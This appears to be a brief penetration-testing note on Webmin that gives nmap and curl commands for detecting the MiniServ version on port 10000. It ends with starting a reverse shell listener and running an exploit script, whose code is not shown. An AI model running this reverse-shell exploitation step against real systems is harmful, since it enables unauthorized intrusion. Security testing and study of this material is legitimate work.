webmin

source

Webmin (3.3k ⭐) is an open-source web-based interface for system administration for Linux systems. From the interface, we can:

  • Manage packages
  • Manage users
  • Manage system configurations
  • Manage network configurations
  • ...

Port 🐊: 10000 (TCP)


Pentester Notes ☠️

$ nmap -p 10000 IP
10000/tcp open  snet-sensor-mgmt
$ nmap -p 10000 -sV IP
10000/tcp open  http    syn-ack MiniServ 1.890 (Webmin httpd)
  • You can use cURL too if you want to find the version
$ curl -s -I -k https://10.10.199.204:10000 | grep Server
Server: MiniServ/1.890
$ [...] # start a reverse shell listener
$ python3 webmin_exploit.py target_ip target_port host_ip host_port